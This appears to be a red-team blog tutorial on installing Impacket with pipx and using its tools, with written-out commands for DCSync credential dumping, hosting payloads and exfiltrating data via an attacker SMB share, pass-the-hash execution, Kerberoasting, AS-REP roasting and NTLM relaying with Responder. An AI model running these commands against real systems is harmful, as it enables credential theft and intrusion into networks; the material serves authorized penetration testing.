How to Install Impacket - The Complete Guide for Red Teamers

Greetings, fellow hackers and pen testers! In this article, I’ll walk you through the process of installing Impacket, a powerful and widely used Python library for working with network protocols. Impacket is a must-have tool for any red teamer or pen tester, as it provides a wealth of functionality for interacting with Windows networks, exploiting vulnerabilities, and more. By the end of this article, you can confidently install Impacket on your machine and start using it in your next engagement.

What is Impacket?

Before we dive into the installation process, let’s take a quick look at Impacket and its capabilities. Impacket is a collection of Python classes and example scripts for working with network protocols commonly found in Windows environments (SMB, MSRPC, Kerberos, NTLM, and more). It enables tasks like authentication, enumeration, remote command execution, credential extraction, and relaying in authorized testing scenarios.

Impacket includes several useful tools and utilities, including:

smbclient.py: An SMB client for interacting with shares and performing file operations
samrdump.py: A tool for enumerating users and groups via the SAMR RPC interface
wmiexec.py: A semi-interactive command execution approach using WMI
psexec.py: Remote command execution via SMB and the Windows Service Control Manager (SCM)
secretsdump.py: Credential material extraction (SAM/LSA/NTDS techniques)
GetUserSPNs.py / GetNPUsers.py: Kerberos ticket requests for offline analysis (when configured in AD)

These tools can be incredibly useful in various situations, from performing recon on a network to gaining remote access to a compromised system. With that in mind, let’s get started with the installation process.

Installing Impacket: The Professional Way

Step 1: Install Python and pip

Before installing Impacket, you’ll need to ensure you have Python and pip installed on your system. Many Linux distributions ship with Python 3, but macOS does not always include python3 by default. To check, open a terminal window and type:

python3 --version

If you see output that looks like Python 3.10.6, you are good to go. Impacket works best with Python 3.8+.

Step 2: The Power of `pipx`

While you can install Impacket directly into your global Python environment with pip, I strongly advise against it. This can lead to “dependency hell” where different tools require conflicting versions of libraries.

Instead, use pipx. pipx installs tools in isolated environments but exposes their commands globally.

# Install pipx
python3 -m pip install --user pipx
python3 -m pipx ensurepath

# Reload your shell
source ~/.bashrc  # or ~/.zshrc

Step 3: Installing Impacket via `pipx`

Now, let’s install Impacket properly. Since red teamers often need the latest bleeding-edge features, we will install directly from the GitHub repository:

pipx install git+https://github.com/fortra/impacket.git

This command creates a dedicated virtual environment for Impacket, installs all dependencies, and links all the scripts (secretsdump.py, wmiexec.py, etc.) to your path. You can now run them from anywhere!

To update it later, simply run:

pipx upgrade impacket

If you want to pin to a specific branch or commit for repeatable tooling during an engagement, reinstall with an explicit ref:

pipx install --force git+https://github.com/fortra/impacket.git@<branch-or-commit>

Mastering the Tools: A Deep Dive

Now that you have Impacket installed, let’s examine how to use the most critical tools in the suite.

1. `secretsdump.py`: The Keys to the Kingdom

secretsdump.py is perhaps the most famous tool in the collection. It performs various techniques to dump secrets from the remote machine without executing any agent.

Key Features:

Dumps NTLM hashes from the SAM database.
Dumps LSA secrets.
Dumps the NTDS.dit (Active Directory database) via DRSUAPI.

Usage Examples:

Dump local SAM hashes using local admin credentials:

secretsdump.py 'DOMAIN/User:Password@192.168.1.10'

Dump the entire Domain Controller database (DCSync attack):

secretsdump.py -just-dc-ntlm 'DOMAIN/DomainAdmin:Password@DC_IP'

2. `smbserver.py`: Instant File Sharing

Need to exfiltrate data or host a payload for a target to download? smbserver.py sets up a lightweight SMB server in seconds.

Usage:

# Share the current directory as "SHARE"
sudo smbserver.py SHARE . -smb2support

On the victim machine, you can now access your files:

copy \\YOUR_IP\SHARE\payload.exe C:\Windows\Temp\

Pro Tip: This is also great for capturing NTLMv2 hashes if you can trick a user or service into authenticating to your share.

3. `wmiexec.py`: Stealthy Command Execution

wmiexec.py allows you to execute commands on a remote Windows system using the Windows Management Instrumentation (WMI) protocol. It effectively gives you a semi-interactive shell.

Why use it over PsExec? PsExec-style execution commonly involves creating a service on the target, which is often high-signal to defenders. wmiexec.py uses WMI to create processes and is frequently quieter than service-based approaches, but it can still generate logs and may touch the filesystem indirectly (for example, for output retrieval) depending on configuration and target settings.

Usage:

wmiexec.py 'DOMAIN/User:Password@TargetIP'

If you only have the hash (Pass-the-Hash):

wmiexec.py -hashes :NTLM_HASH 'DOMAIN/User@TargetIP'

Advanced Attacks: Kerberos and Relaying

Kerberoasting with `GetUserSPNs.py`

Kerberoasting is a technique to request Service Tickets (TGS) for service accounts and crack them offline to recover the plaintext password.

Execution:

# Request TGS for all users with SPNs
GetUserSPNs.py 'DOMAIN/User:Password' -dc-ip 192.168.1.5 -request

This will output hashcat-formatted hashes. Save them and crack them!

AS-REP Roasting with `GetNPUsers.py`

This attack targets users with “Do not require Kerberos preauthentication” enabled. You don’t even need a valid domain user password—just a username list!

Execution:

GetNPUsers.py 'DOMAIN/' -usersfile users.txt -no-pass -format hashcat -outputfile asreproast.txt

NTLM Relaying with `ntlmrelayx.py`

ntlmrelayx.py is a beast. It listens for incoming NTLM authentication requests (via SMB, HTTP, etc.) and relays them to other machines to execute commands or dump data.

Scenario: You are on a local network. You start Responder to poison LLMNR/NBT-NS, but you turn off the SMB and HTTP servers in Responder. You pass those requests to ntlmrelayx.

Configure Responder: Edit Responder.conf and set SMB = Off and HTTP = Off.

Start ntlmrelayx:

ntlmrelayx.py -tf targets.txt -smb2support

Start Responder:
```
responder -I eth0
```

When a victim tries to access a non-existent resource, Responder directs them to you. ntlmrelayx grabs their credentials and relays them to the machines in targets.txt. If the victim is an admin on a target, you get a shell!

Conclusion

Impacket is not just a tool; it’s a framework that underpins modern network penetration testing. Whether you are moving laterally with wmiexec, dumping credentials with secretsdump, or performing advanced Kerberos attacks, Impacket is the engine that drives the red team.

By installing it via pipx and understanding the nuance of each tool, you ensure you have a stable, powerful platform for your engagements. Now, go forth and enumerate!

For more information, check out the official Impacket repository: https://github.com/fortra/impacket

What is Impacket?#

Installing Impacket: The Professional Way#

Step 1: Install Python and pip#

Step 2: The Power of pipx#

Step 3: Installing Impacket via pipx#

Mastering the Tools: A Deep Dive#

1. secretsdump.py: The Keys to the Kingdom#

2. smbserver.py: Instant File Sharing#

3. wmiexec.py: Stealthy Command Execution#

Advanced Attacks: Kerberos and Relaying#

Kerberoasting with GetUserSPNs.py#

AS-REP Roasting with GetNPUsers.py#

NTLM Relaying with ntlmrelayx.py#

Conclusion#